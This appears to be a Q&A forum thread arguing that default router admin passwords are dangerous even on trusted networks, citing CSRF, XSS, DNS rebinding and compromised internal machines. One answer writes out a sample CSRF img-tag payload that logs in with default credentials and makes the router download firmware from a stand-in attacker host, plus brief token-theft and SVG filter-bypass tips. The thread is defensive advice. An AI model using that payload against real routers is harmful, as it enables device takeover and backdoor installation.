Is it dangerous to use default router admin passwords if only trusted users are allowed on the network?
As you correctly noticed CSRF attacks are a possibility. Prevention of CSRF attacks is possible with a CSRF token, but this is nothing you can do as the user of the router. So if you are a router vendor you should definitely implement CSRF protection but as a user you have to live with what the vendor offers you and many vendors don't have proper CSRF protection.
Beyond CSRF there are other attacks which can be used against the router. Similarly to CSRF, many of these use the browser as the trampoline, i.e. just require a visit to some web site which has exploits embedded (like embedded in advertisements) and don't need a compromise of the user's computer. Noticeable among these are cross site scripting (XSS) and DNS rebinding attacks. Here again the vendor could implement proper protection in theory, but in practice it is often not done.
And then even trusted users might have their system compromised through a variety of ways. In this case the attacker is inside the trusted network and knowledge of default passwords makes it a lot easier to hijack the router and make the attacker's control over the network more permanent and less obvious this way.
This means even if you think you have proper protection, you should change the password away from the default in the spirit of defense in depth. The more unknowns an attacker has to find out to infiltrate the network, the harder you make it for him, and the better you secure your network. And of course this also applies not only to the password but general router security, i.e. some routers have bugs or even backdoors where you don't even have to know the user's password for a takeover. And it's not only routers but you also have to watch out for other devices like printers, scanners, smart light bulbs, TV etc.
Is it dangerous to use default router admin passwords if only trusted users are allowed on the network?
Yes, it's dangerous. Here are a few more "technical" ways to do it (other than saying it's bad):
1. No CSRF Protection
You could be happily visiting a website, and there could be any number of issues with it:
The website itself was haxored and has malicious content inserted in it, or;
Any of the elements on the page have been MITM in the middle attacked (shut up, I'm trying to be funny) and have had elements intercepted with The Thing(tm), and;
CSRF attack was inserted by style, img, link, or anything else:
Rough example:
<img src="http://admin:[email protected]/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/>
In many cases, the CSRF protection won't help if you can log in with admin:admin@routerip through a link like that. It will create a new session and token for you instead of using your current one.
Congratulations on your newest installation of Router Backdoor(tm) with full shell access.
2. CSRF protection exists, but not Proper XSS Protection
Escape context and insert hax.js, or just JS code which could perform the following functions:
- Steal CSRF token with javascript
- See
<img src=""/>above.
Also, .svg images can bypass a lot of XSS protection.
3. Router configuration page is accessible via the wireless network?
Someone logs in to your wireless network, visits the router configuration page and makes necessary changes/upgrades the firmware/redirects DNS/whatever they want. Like the first one, but with a point-and-click interface instead.
4. Other ways
- Disgruntled employees
- If anyone finds their way on your network through another compromised machine, they can use that machine to compromise your router and then you're boned.
Keep in mind, XSS/CSRF attacks could exist, or even be added during upgrades, if the vendor is crap.
So don't do it. Please. My heart can't take it. :(
Yes, routers have been compromised by malware executing inside the network, testing a list of default passwords. The malware enters the network through an infected phishing attachment, or a browser exploit.
If you have the ability to validate the router can't be reconfigured outside of the local network, you not only have the ability to change the default password, you have a duty to fix it.